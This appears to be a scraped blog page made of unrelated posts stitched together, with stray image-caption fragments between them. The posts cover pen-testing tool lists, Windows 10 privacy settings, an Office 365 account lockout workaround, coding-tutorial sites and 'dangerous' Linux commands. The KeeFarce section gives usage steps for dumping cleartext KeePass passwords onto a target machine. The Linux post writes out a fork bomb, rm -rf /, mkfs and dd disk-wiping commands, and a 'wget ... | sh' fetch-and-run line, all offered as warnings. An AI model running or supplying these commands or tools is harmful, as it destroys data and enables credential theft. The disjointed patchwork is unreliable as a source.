tv - programerWhat is Penetration Testing?

Pen tests can be automated with software applications or they can be performed manually. Either way, the process includes gathering information about the target before the test (reconnaissance), identifying possible entry points, attempting to break in (either virtually or for real) and reporting the findings.

The main objective of penetration testing is to determine security weaknesses. A pen test can also be used to test an organization’s security policy compliance, its employees’ security awareness and the organization’s ability to identify and respond to security incidents.

Penetration tests are sometimes called white hat attacks because in a pen test, the good guys are attempting to break in.

What’s Kali Linux ?

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools aimed at various information security tasks, such as Penetration Testing, Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

Top 19 Penetration Testing Tool In Kali linux 2.0


meta1. Metasploit

This is the most advanced and popular Framework that can be used to for pen-testing. It is based on the concept of ‘exploit’ which is a code that can surpass the security measures and enter a certain system. If entered, it runs a ‘payload’, a code that performs operations on a target machine, thus creating the perfect framework for penetration testing.

It can be used on web applications, networks, servers etc. It has a command-line and a GUI clickable interface, works on Linux, Apple Mac OS X and Microsoft Windows. This is a commercial product, although there might be free limited trials available.

armi2. Armitage

Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

Through one Metasploit instance, your team will:


Use the same sessions

Share hosts, captured data, and downloaded files

Communicate through a shared event log.

Run bots to automate red team tasks.

wire3. Wireshark

This is basically a network protocol analyzer –popular for providing the minutest details about your network protocols, packet information, decryption etc. It can be used on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many other systems. The information that is retrieved via this tool can be viewed through a GUI, or the TTY-mode TShark utility.


burp4. Burpsuite

Burp suite is also essentially a scanner (with a limited “intruder” tool for attacks), although many security testing specialists swear that pen-testing without this tool is unimaginable. The tool is not free, but very cost effective. Take a look at it on below download page. It mainly works wonders with intercepting proxy, crawling content and functionality, web application scanning etc.  You can use this on Windows, Mac OS X and Linux environments.


acun5. Acunetix

Acunetix is essentially a web vulnerability scanner targeted at web applications. It provides SQL injection, cross site scripting testing, PCI compliance reports etc. along with identifying a multitude of vulnerabilities. While this is among the more ‘pricey’ tools.


john6. John The Ripper

Another password cracker in line is, John the Ripper. This tool works on most of the environments, although it’s primarily for UNIX systems. It is considered one of the fastest tools in this genre. Password hash code and strength-checking code are also made available to be integrated to your own software/code which I think is very unique. This tool comes in a pro and free form.


set7. Social Engineer Toolkit

The Social-Engineer Toolkit (SET) is a unique tool in terms that the attacks are targeted at the human element than on the system element. It has features that let you send emails, java applets, etc containing the attack code. It goes without saying that this tool is to be used very carefully and only for ‘white-hat’ reasons.  It has a command-line interface, works on Linux, Apple Mac OS X and Microsoft Windows.

nmap8. Nmap

“Network Mapper” though not necessarily a pen-testing tool, it is a must-have for the ethical hackers. This is a very popular tool that predominantly aids in understanding the characteristics of any target network. The characteristics can include: host, services, OS, packet filters/firewalls etc.  It works on most of the environments and is open sourced.


beef9. BeEF

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser- what this means is that, it takes advantage of the fact that an open web-browser is the window(or crack) into a target system and designs its attacks to go on from this point on . It has a GUI interface, works on Linux, Apple Mac OS X and Microsoft Windows.


air10. Aircrack-ng

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the PTW attack, thus making the attack much faster compared to other WEP cracking tools.

In fact, Aircrack-ng is a set of tools for auditing wireless networks.

sqlmap11. Sqlmap

Sqlmap is again a good open source pen testing tool. This tool is mainly used for detecting and exploiting SQL injection issues in an application and hacking over of database servers. It comes with command-line interface. Platform: Linux, Apple Mac OS X and Microsoft Windows are supported platforms.

etta12. Ettercap

Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. It can be used for computer network protocol analysis and security auditing. It runs on various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows.

hydra13. Hydra

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

malt14. Maltego

Maltego is a program built into Kali Linux that lets you do reconnaissance on any person, by scraping up data from all publicly available areas of the Internets. Maltego is used for information gathering and data-mining, and can be useful for anyone who needs to gather data on a person or company


nikkto15. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers.


ninja16. Sqlninja

Sqlninja, as the name indicates is all about taking over the DB server using SQL injection in any environment. This product by itself claims to be not so stable its popularity indicates how robust it is already with the DB related vulnerability exploitation. It has a command-line interface, works on Linux, Apple Mac OS X and not on Microsoft Windows.


core17. CORE Impact

CORE Impact Pro can be used to test mobile device penetration, network/network devise penetration, password identification and cracking, etc. It has a command-line and a GUI clickable interface, works Microsoft Windows. This is one of the expensive tools in this line.

canvas18. Canvas

Immunity’s CANVAS is a widely used tool that contains more than 400 exploits and multiple payload options. It renders itself useful for web applications, wireless systems, networks etc. It has a command-line and GUI interface, works on Linux, Apple Mac OS X and Microsoft Windows. It is not free of charge and can more information can be found at below page.

retina19. Retina

As opposed to a certain application or a server, Retina targets the entire environment at a particular company/firm. It comes as a package called Retina Community. It is a commercial product and is more of a vulnerability management tool more than a pen-testing tool. It works on having scheduled assessments and presenting results. Check out more about this package at below page.


Windows TVIf you have installed Windows 10 and agreed to its terms and conditions during installation then you are being spied on and this is not a conspiracy theory but a fact.

Here’s what’s going on and how you can prevent yourself from being spied on.

Microsoft’s new service agreement consists of about 12,000 words, which clearly states that the operating system will be invading your privacy like never before and if you haven’t read that then it’s not your mistake, we hardly read TOS (Terms Of Service) anyway.

So the Microsoft’s new service agreement states that,


Microsoft does, however, also gives you an option to opt-out of features that you think may be invading your privacy, but remember if you have installed Windows 10 you have opted-in for all features by default.


If you are reading this section because you are seriously worried about this, understand that opting out of Windows 10 is not so straightforward. However, if you follow each of the mentioned steps thoroughly then you will be able to prevent yourself from Windows 10 spying in no time.

NOTE: These steps will be appropriate in both cases, either you are about to install Windows 10 on your computer, or if you have already installed it without paying extra attention to the installation instructions. Depending on your situation, you might need to perform all of the following.

Here are 4 simple tasks you have to follow to stop Windows 10 from spying on you:

Task # 1: Go to ‘Settings’ -> ‘Privacy’. From there you will have to go through 13 different selection screens, turning everything of your concern to ‘off’. After that, you will find some of the most important setting under ‘General’ section, whereas the other setup screens will let you select whether you want specific Windows apps to access your messages, camera, calendar and other areas.

Task # 2: You might also want to change Cortana’s settings, turning every option to ‘off’. But your selections completely depends on whether you are finding this feature useful or not.

Task # 3: This one is an essential option that you have to turn off. And many are going to miss this one because these settings are only changeable through an external website. So head over to, there you will find two selections i.e. “Personalized ads in this browser” and “Personalised ads wherever I use my Microsoft account”. Turn both of them to ‘off’.


Task # 4: To add another layer of privacy, you might also be interested in removing your Microsoft account from Windows 10, and use some local account instead. Doing this might take away some of the features like Synchronisation across other devices, OneDrive and Windows Store – won’t be a big deal for many! So to remove your Microsoft account, head over to ‘Settings’ -> ‘Accounts’ -> ‘Your Account within Windows 10’, and from there you will be able to remove the account.

Windows 10 will sync data and settings by default with its servers. That includes browser history, currently open web pages, favorites pages, websites, saved apps, Wi-Fi network names and passwords and mobile hotspot passwords.

We also advise you not to activate Cortana, Microsoft’s personal virtual assistant, but if you have already activated it here’s what you’ve allowed it to collect:

  • Your device location
  • Your email and text messages data
  • Your Calendar data
  • Apps you are using
  • Your contact list
  • Who’s calling you
  • With who you are in touch more often
  • Your alarm settings,
  • Your music on device
  • What you purchase
  • Your search history in case you’re using Bing search engine.


This is not it,


Windows 10 can also use you for marketing and advertising purposes as it generates a unique advertising ID for users on every device which can be further used to serve commercial content.

Though Windows 10 comes with default capability of automatically detecting malware on user’s PC, but when it’s collecting personal data as such a level you don’t need a malware.

So Windows 10 is spying on you, do opt-out from all such features you think are privacy invasion for you.

tv - programer

There is one key administrative feature that seems to be missing from Microsoft Office 365 – the “kill switch” that disables an Office 365 account and kills all active sessions (browser, ActiveSync, etc.).  Without official guidance from Microsoft, there has been speculation from Office 365 Admins on the best approach for disabling access to an Office 365 account in the event of a breach or security issue.

  • Change the password on the mailbox
  • Remove the mailbox using the “Remove-Mailbox” command
    • For example:
Remove-Mailbox -Identity "John Rodman"
  • Wait 15 minutes
  • Restore the mailbox

Restoring the mailbox is an important step in this process, since the mailbox will be automatically deleted if you do not restore it within 30 days.

tv crime2KeeFarce allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and url’s are dumped into a CSV file in %AppData%.

General Design

KeeFarce uses DLL injection to execute code within the context of a running KeePass process. C# code execution is achieved by first injecting an architecture-appropriate bootstrap DLL. This spawns an instance of the dot net runtime within the appropriate app domain, subsequently executing KeeFarceDLL.dll (the main C# payload).

The KeeFarceDLL uses CLRMD to find the necessary object in the KeePass processes heap, locates the pointers to some required sub-objects (using offsets), and uses reflection to call an export method.

Prebuilt Packages

An appropriate build of KeeFarce needs to be used depending on the KeePass target’s architecture (32 bit or 64 bit). Archives and their shasums can be found under the ‘prebuilt’ directory.


In order to execute on the target host, the following files need to be in the same folder:

  • BootstrapDLL.dll
  • KeeFarce.exe
  • KeeFarceDLL.dll
  • Microsoft.Diagnostic.Runtime.dll

Copy these files across to the target and execute KeeFarce.exe


Open up the KeeFarce.sln with Visual Studio (note: dev was done on Visual Studio 2015) and hit ‘build’. The results will be spat out into dist/$architecture. You’ll have to copy the KeeFarceDLL.dll files and Microsoft.Diagnostic.Runtime.dll files into the folder before executing, as these are architecture independent.


KeeFarce has been tested on:
KeePass 2.28, 2.29 and 2.30 – running on Windows 8.1 – both 32 and 64 bit.
This should also work on older Windows machines (win 7 with a recent service pack). If you’re targeting something other than the above, then testing in a lab environment before hand is recommended.


tv - programerSearching for where to learn how to code for free,then stop.You are in perfect place,here we are listing Top 50 websites that will help you to learn how to code.Below listed website will help you to find a good coding platform for beginners.From here you will learn HTML, CSS, Javascript, SQL, XHTML, Bootstrap, C, C++, Python, Ruby, Android Development, Java and lots more.So check out each of this website and start to learn how to code.



The most heard name how to code.Codeacademy is the place to go if you aren’t quite sure where to start.The main plus point of Codecademy is that they have a advanced interface to type code and render it without using external notepad or browser.Codeacademy works on a reward system and it rewards you with badges for your achievements.Codecademy will help you to learn HTML & CSS, JavaScript, jQuery, PHP, Python, SQL, Ruby, Rails and AngularJS.


Udacity is the next best on the web to learn to code.Udacity offers video tutorials inserted with quizzes at each intervals. The video tutorials offered at Udacity are broken down into minutes of 2-3 that simply do what they were meant to.Udacity also offers a final test on your course and provides you with a downloadable certificate as shown below, for your achievement.Udacity will help you to learn Computer Science, Web Application Engineering, Software Testing, Web Development, HTML5, Python, Java, Computer Science, Algorithm.

3.Google Android Development

If you like to learn Android development,then this is the best place.Learn it from the creators.Google offers an advanced android development tutorials for its users.They will teach you from how to make an app to how to submit it in Playstore.

4.Google’s Python Class

Google’s Python Class — this is a free class for people with a little bit of programming experience who want to learn Python. The class includes written materials, lecture videos, and lots of code exercises to practice Python coding. These materials are used within Google to introduce Python to people who have just a little programming experience.


Coursera offers a wide range of courses in Computer science alone, and you cannot start off instantly. Although it is free, the classes are conducted once in every few months and you have to enrol in advance to the class, or add it in your wishlist for the next class.Coursera will guide you to learn Languages – Computer architecture, Programming languages, C++ for C programming, Algorithms, Artificial Intelligence, Cryptography…etc

Courses offered by are basic concepts of Computer Science with drag and drop programming, basics of JavaScript programming , Python, Hopscotch etc


W3Schools is optimized for learning, testing, and training.They will guide you to learn HTML, CSS, Javascript, jQuery, Bootstrap


The New Boston offers an incredible collection of video tutorials for all types of programming, including iPhone and computer game development.Thenewboston provides video tutorials for HTML5, CSS, Javascript, Java, Python, PHP, App Development, Android Development, C Programming.

9.MIT OpenCourseWare

Find more than a hundred online course materials for electrical engineering and computer science in MIT’s OpenCourseWare collection

10.Khan Academy

One of the original free online coding resources, Khan Academy has come a long way. With easy-to-follow course sections with step-by-step video tutorials, Khan Academy is a great place to get started with your coding career.It does not offer a set of programming languages, but it deals with programming basics and approach to coding that could be applied to a vast array of languages.


On Webmonkey, you’ll find tutorials for everything from building your first website to developing with HTML5.Tutorial section includes HTML5, Ajax, CSS, APIs, Javascript etc.


Codeavengers will teach you how to develop your own games, websites and apps.Tutorials includes HTML, CSS, Javascript, Python etc.

Am not making you bored here is the quick list of remaining 38 websites:

Websites What You Will Learn
 13. Codeschool HTML/CSS, JavaScript, Ruby, iOS
 14. TeamTreeHouse HTML/CSS, JavaScript, Ruby, iOS, Android, Python…
 15. Html5Rocks HTML5/CSS
16. Sqlzoo SQL
17. EDX Computer Science, Java
18. TheCodePlayer HTML5, CSS3, Javascript, Jquery
 19. LearnPythonTheHardWay Python
 20. SkillCrush HTML/CSS, Javascript, Python …more
21. TutsPlus WordPress Plugin Development, Webdesigning, Other Coding tutorials
22. CodeCombat Play to learn code
 23. DontFearTheInternet HTML/CSS
 24. LearnLayout Advanced CSS
25. Atozcss CSS Screencasts
26. Dash HTML5, CSS3, Javascript
 27. Web Accessibility Tools and techniques for web developers
 28. TheHelloWorldProgram Web Development, Linux, Python
29. PythonTutor Python
 30. CodeLearn Web Development
31. Rubymonk Ruby
 32. Stanford University Software Algorithms
33. NodeTuts Node JS video tutorials
 34. NodeSchool Web software skills
 35. Egghead Video training for AngularJS, React, D3, and many other essential modern web technologies
36. Learn-Angular AngularJS
37. IOS Development IOS
38. LearnJavaOnline Java
 39. CodingBat Java, Python
40. Techotopia  IOS, Android
41. EssentialSQL  SQL
42. SqlBolt  SQL
 43. Coderdojo HTML5, CSS3, Javascript
44. HackDesign Design course
45. Mozilla Developer Network Mozilla Development
 46. Programming Video Tutorials C++
47. National Programme on Technology Enhanced Learning Principles of Programming Languages
48. Landofcode Java, CSS, HTML, PHP and VBScript
49. SitePoint Reference HTML5, CSS3, Javascript
50. Wikiversity  PHP, C++, Python, Java… etc


hackers_4996108_lrgMost penetration testers are using either a Mac or a Linux-based platform in order to perform their penetration testing activities.However it is always a good practice to have and a Windows virtual machine with some tools ready to be used for the engagement.The reason for this is that although Windows cannot be used as a main platform for penetration testing some of the utilities and tools can still help us to extract information from our windows targets.So in this post we will see some of the tools that we can use in our windows system.

HashCheck Shell Extension

The HashCheck Shell Extension makes it easy for anyone to calculate and verify checksums and hashes from Windows Explorer. In addition to integrating file checksumming functionality into Windows, HashCheck can also create and verify SFV files (and other forms of checksum files, such as .md5 files).


Netcat is often referred to as a “Swiss-army knife for TCP/IP”. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.

Metasploit Framework

The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

RealVNC Viewer

Remote access software for desktop and mobile platforms.


SNMP tool that allows you to collect information about SNMP devices.

Cain & Abel

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.


Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development.


PuTTY is an SSH and telnet client for the Windows platform.

Pass The Hash Toolkit

The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes.


Recovering Windows Password Cache Entries.


Identify unknown open ports and their associated applications.


This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares.

Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.


Winfo uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. It also identifies the built-in Administrator and Guest accounts, even if their names have been changed.


ClearLogs clears the event log (Security, System or Application) that you specify. You run it from the Command Prompt, and it can also clear logs on a remote computer.


SQLdict is a dictionary attack tool for SQL Server.


PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process.


GrabItAll performs traffic redirection by sending spoofed ARP replies. It can redirect traffic from one computer to the attackers computer, or redirect traffic between two other computers through the attackers computer. In the last case you need to enable IP Forwarding which can be done with GrabItAll too.


DumpUsers is able to dump account names and information even though RestrictAnonymous has been set to 1.


BrowseList retrieves the browse list. The output list contains computer names, and the roles they play in the network. For example you can see which are PDC, BDC, stand-alone servers and workstations. You can also see the system comments (which can be very interesting reading).


Remoxec executes a program using RPC (Task Scheduler) or DCOM (Windows Management Instrumentation).


Brute-force tool for Windows Management Instrumentation (WMI).


Venom is a tool to run dictionary password attacks against Windows accounts by using the Windows Management Instrumentation (WMI) service. This can be useful in those cases where the server service has been disabled.


The SMB Auditing Tool is a password auditing tool for the Windows-and the SMB-platform. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremly fast to guess passwords on these platforms.


RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins.


LSASecretsDump is a small console application that extract the LSA secrets from the Registry, decrypt them, and dump them into the console window.


SQL Ping is a nice little command line enumerator that specifically looks for SQL servers and requires no authentication whatsoever.


The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers.


Extract password hashes from local user accounts.


The PsTools package provides a set of command line utilities that allow you to manage local and remote systems.


Incognito is a tool for manipulating windows access tokens and is intended for use by penetration testers, security consultants and system administrators.


DumpSec is a security auditing program for Microsoft Windows® NT/XP/200x. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers and shares in a concise, readable format, so that holes in system security are readily apparent. DumpSec also dumps user, group and replication information.


X-Deep/32 is an X Window Server for Windows NT/2000/9X/ME/XP that can be used to connect to host systems running UNIX, LINUX, IBM AIX etc.


Windows password cracker.


Ophcrack is a free Windows password cracker based on rainbow tables.


SiVus is the first publicly available vulnerability scanner for VoIP networks that use the SIP protocol. It provides powerful features to assess the security and robustness of VoIP implementations.

Linux shell or terminal commands are very powerful and just a simple command could lead one to delete a folder, files or root folder, etc. Linux never asks for confirmation rather it will execute the command right away causing you to lose useful data and information stored in these files and folders.

Take a look at the 9 commands and codes you should avoid executing.

1. Linux Fork Bomb Command

:(){ :|: & };: also known as Fork Bomb is a denial-of-service attack against a Linux System. :(){ :|: & };: is a bash function. Once executed, it repeats itself multiple times until the system freezes.

To get ride of this you need to restart or reboot your server. So be careful when executing this command on your Linux shell.

2. Mv Folder/Dev/Null Command

mv folder/dev/null is another risky command. Dev/null or null device is a device file that discards all the data written on it but it reports that the writing operation is executed successfully. It is also known as bit bucked or black hole.

3. Rm -Rf Command

rm -rf command is a to delete a folder and its content in the Linux operating system. If you don’t know how to use it then its very dangerous to the system. The most common combinations and options used with rm-rf command are listed below:

  • rm command is used to delete the files in Linux system.
  • rm -f command removes read-only files in folder without prompting.
  • rm -r command deletes the content of a folder recursively.
  • rm -d command is used to remove an empty directory but it will refuse to remove directory if it is not empty.
  • rm -rf/ command is used for forced deletion (it deletes it even if it’s write protected) of all the content in root directory and sub folders.
  • rm -rf* command is used for forced deletion of all the content in the current directory (directory you are currently working in) and sub folders.
  • rm -rf. command is used for forced deletion of all the content in the current folder and sub folders. The rm -r.[^.]* command can also be used.
  • rm -i command is used for removal of files and folders but a prompt will appear before removal.

4. Mkfs Command

mkfs can be a dangerous command for your Linux based system if you don’t know its purpose. Anything written after the mkfs will be formatted and replaced by a blank Linux file system.

The below given commands will format the hard drive and need administration power

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat
  • mkfs.cramfs ( No need of administration power)

5. Tar Bomb

The tar command is used combine many number of files to single file (archived file) in.tarformat. A Tape Archive (Tar) bomb can be created with this command.

It is an archive file which explodes into thousands or millions of files with names similar to the existing files into the current directory rather than into a new directory when untarred.

To avoid becoming a victim of a tar bomb by regularly creating a new protective directory whenever you receive a tar file and then moving the received tar file into this directory before untarring.If the tar file is indeed a tar bomb then you can simply remove the newly created directory to get rid of it.

Another way to avoid the explosion of a tar bomb is via the -t option to list all of the content of a tar file to give you an idea of the type of content contained within the tar file.

6. Dd Command

The dd command is used to copy & convert hard disk partitions. However, it can turn out to be harmful if you specify the wrong destination.

The command may be any one of these:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda
  • dd if=/dev/zero of=/dev/had (will zero out the whole primary hard drive)

7. Shell Script Code

Someone may victimize you by giving you the link to a shell script and endorsing you to download and execute it. The script may contain some malicious or dangerous code inside. The format of command may look like this: wget http://some_malicious_source -O- | sh. The wget will download the script while the sh downloads the script execution.

8. Malicious Source Code

Someone gives you the source code and asks you to compile it. The code may appear to be a normal code but in fact some malicious code is disguised in the large source code and it may cause harm to your system. To avoid being victimized by this kind of attack, only accept and compile your source code from trustworthy sources.

9. Decompression Bomb

You have received a compressed file and you are asked to extract this file which appears to be very small in size but may be a few KB. In fact, this small sized compressed file contains very highly compressed data.

Once the file is decompressed, hundreds of GB of data is extracted which can fill up your hard drive to bring down the performance of your system.